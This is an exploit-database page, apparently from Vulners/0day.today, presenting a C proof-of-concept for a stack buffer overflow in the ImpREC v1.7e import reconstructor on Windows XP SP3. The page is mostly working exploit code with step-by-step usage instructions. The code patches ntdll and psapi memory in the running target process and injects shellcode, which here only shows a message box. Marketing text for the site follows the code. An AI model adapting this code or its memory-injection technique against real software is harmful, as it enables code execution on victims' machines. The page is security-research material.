Vulners
Lucene search
ImpREC v1.7e Buffer Overflow Exploit
/*
* Q: what is it?
* A: stack-based buffer overflow vulnerability PoC exploit.
*
* Q: which program is vulnerable?
* A: ImpREC v1.7e
*
* Q: what prerequisites are?
* A: Windows XP SP3 x86, a bit of luck.
*
* Q: what should I do?
* A:
* 1) compile imprec-exploit.c as imprec-exploit.exe;
* 2) run ImpREC;
* 3) select ImpREC process in the list "Attach to an Active Process";
* 4) open a command line;
* 5) "imprec-exploit.exe <ImpREC PID>", see "[+] The memory has patched." if
* all is ok;
* 6) close the command line;
* 7) set "RVA" field to 7C514001, "Size" to 00000010, click "Get Imports";
* 8) set "RVA" field to 7C514002, "Size" to 00000010, click "Get Imports";
* 9) set "RVA" field to 7C514003, "Size" to 00000010, click "Get Imports";
* 10) see the message box.
*
* Q: it does not work!
* A: there are several reasons:
* 1) psapi.dll did not loaded at 0x51400000. All Windows XP I have tested
* loads the library at this address, but newer are not because of ASLR.
* 2) some libraries like msctfime.ime can execute an instructions at
* 0x7c914001 (ntdll) after 5'th step and it will cause an access violation
* before you can proceed. The more clean Windows XP you use, the more
* chances you will not get this.
*/
#include <stdio.h>
#include <windows.h>
char destroyer[] =
"\x00\x00\x00\x00\x00\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
char shellcode[] =
"\x31\xc0\x68\x21\x00\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20"
"\x77\x68\x48\x65\x6c\x6c\x89\xe3\x50\x53\x53\x50\xff\x15\xb8\xd3"
"\x44\x00\x50\xff\x15\xa8\xd0\x44\x00";
int main(int argc, char* argv[])
{
HANDLE imprec;
int bytes_written;
int old_protect;
if (argc != 2) {
printf("Usage: %s <ImpREC PID>\n", argv[0]);
return 1;
}
imprec = OpenProcess(
PROCESS_VM_OPERATION | PROCESS_VM_WRITE,
FALSE,
atoi(argv[1]));
if (!imprec) {
printf("[-] Cannot open ImpREC process.\n");
return 1;
}
if (!VirtualProtectEx(
imprec,
(void*) 0x7c914000,
0x1000,
PAGE_EXECUTE_READWRITE,
&old_protect)) {
printf("[-] Cannot set page protection of ntdll.dll memory.\n");
CloseHandle(imprec);
return 1;
}
if (!VirtualProtectEx(
imprec,
(void*) 0x51400000,
0x1000,
PAGE_EXECUTE_READWRITE,
&old_protect)) {
printf("[-] Cannot set page protection of psapi.dll memory.\n");
CloseHandle(imprec);
return 1;
}
if (!WriteProcessMemory(
imprec,
(void*) 0x7c914001,
destroyer,
16,
&bytes_written)) {
printf("[-] Cannot write the destroyer bytes to ntdll.dll memory.\n");
CloseHandle(imprec);
return 1;
}
if (!WriteProcessMemory(
imprec,
(void*) 0x5140097c,
shellcode,
41,
&bytes_written)) {
printf("[-] Cannot write the shellcode to psapi.dll memory.\n");
CloseHandle(imprec);
return 1;
}
printf("[+] The memory has patched.");
CloseHandle(imprec);
return 0;
}
# 0day.today [2018-01-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Mar 2015 00:00Current
7.1High risk
Vulners AI Score7.1